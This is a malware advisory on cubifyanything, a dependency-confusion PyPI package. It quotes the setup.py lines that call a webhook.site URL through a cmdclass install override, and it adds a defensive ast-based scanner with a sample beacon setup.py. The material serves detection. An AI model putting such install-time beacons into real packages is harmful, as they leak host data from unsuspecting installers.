Vulnerability
Malicious code in cubifyanything (PyPI)
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (2cab88d6047b15dbb32ca245f083a7eecd1df75ce183d47637c6c9edf5cfd0b4)

cubifyanything 1.0.1 is a dependency-confusion squat shipping no real functionality (top-level cubifyanything/__init__.py is 0 bytes) and a setup.py that installs a custom install command class which performs an HTTP GET to a webhook.site URL at install time, reporting that the package was installed on the target host. setup.py lines 7-10 contain `webhook_url = "https://webhook.site/SƏNİN_WEBHOOK_LİNKİN"` followed by `urllib.request.urlopen(f"{webhook_url}?status=cubifyanything_installed", timeout=5)`, fired automatically from a cmdclass override during `pip install`. The package self-describes as 'Dependency Confusion PoC' with author 'Security Researcher'. Although the placeholder token in the URL (Azerbaijani for 'YOUR_WEBHOOK_LINK') means the specific URL likely fails DNS resolution in this copy, the package's design — claim a name expected to resolve to an internal/private package, ship empty code, and beacon to an attacker-controlled webhook host on install — is the canonical dependency-confusion attack shape and produces install-time outbound traffic from the installer's machine to a third-party endpoint.

## Source: kam193 (c13a0f89f1b7b7185b34200461191cf8c108ac50a05dc8e66151d547a2e4d971)

Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose.

---

Category: PROBABLY_PENTEST - Packages looking like typical pentest packages, but also anything that looks like testing, exploring pre-prepared kits, research & co, with clearly low-harm possibilities.

Campaign: GENERIC-standard-pypi-install-pentest

Reasons (based on the campaign):
- The package contains code to exfiltrate basic data from the system, like IP or username. It has a limited risk.
- The package overrides the install command in setup.py to execute malicious code during installation.
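As an added defensive check (example code written for this page, not code from either source above), the following script uses Python's standard-library `ast` module to flag the setup.py shape described here: a class subclassing setuptools' install command, registered through `cmdclass`, that makes a network call during installation. The function names and the embedded sample setup.py are constructed for this example; the sample URL is a placeholder.

```python
import ast

# Heuristic set of callees treated as "network activity" (dict.get also matches; tune as needed).
NETWORK_CALLS = {"urlopen", "urlretrieve", "create_connection", "socket", "get", "post"}

def _dotted(node):
    # Flatten a Name/Attribute chain such as urllib.request.urlopen into a string.
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    parts.append(node.id if isinstance(node, ast.Name) else "")
    return ".".join(reversed(parts))

def find_install_beacons(setup_py_source):
    """Return (class_name, callee, line) for each network call inside a class that
    subclasses setuptools' install command and is registered via setup(cmdclass=...)."""
    tree = ast.parse(setup_py_source)
    # Classes deriving from `install` (bare name or setuptools.command.install.install).
    classes = {c.name: c for c in ast.walk(tree) if isinstance(c, ast.ClassDef)
               and any(_dotted(b).endswith("install") for b in c.bases)}
    # Class names wired in through the cmdclass keyword of the setup() call.
    registered = set()
    for call in ast.walk(tree):
        if isinstance(call, ast.Call) and _dotted(call.func).endswith("setup"):
            for kw in call.keywords:
                if kw.arg == "cmdclass" and isinstance(kw.value, ast.Dict):
                    registered.update(_dotted(v) for v in kw.value.values)
    findings = []
    for name in sorted(classes.keys() & registered):
        for node in ast.walk(classes[name]):
            if isinstance(node, ast.Call) and _dotted(node.func).split(".")[-1] in NETWORK_CALLS:
                findings.append((name, _dotted(node.func), node.lineno))
    return findings

# Constructed sample with the shape described above; the URL is a placeholder, not the real one.
SAMPLE_SETUP_PY = '''\
import urllib.request
from setuptools import setup
from setuptools.command.install import install
class CustomInstall(install):
    def run(self):
        webhook_url = "https://WEBHOOK-PLACEHOLDER.invalid"
        urllib.request.urlopen(f"{webhook_url}?status=installed", timeout=5)
        install.run(self)
setup(name="example-pkg", version="0.0.1", cmdclass={"install": CustomInstall})
'''
if __name__ == "__main__":
    print(find_install_beacons(SAMPLE_SETUP_PY))
```

Run it against a downloaded sdist's setup.py before installing; an empty result means the cmdclass-plus-network pattern was not found, not that the package is safe.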
No CVSS base score from NVD or GHSA yet.
No exploitation, limited impact or prevalence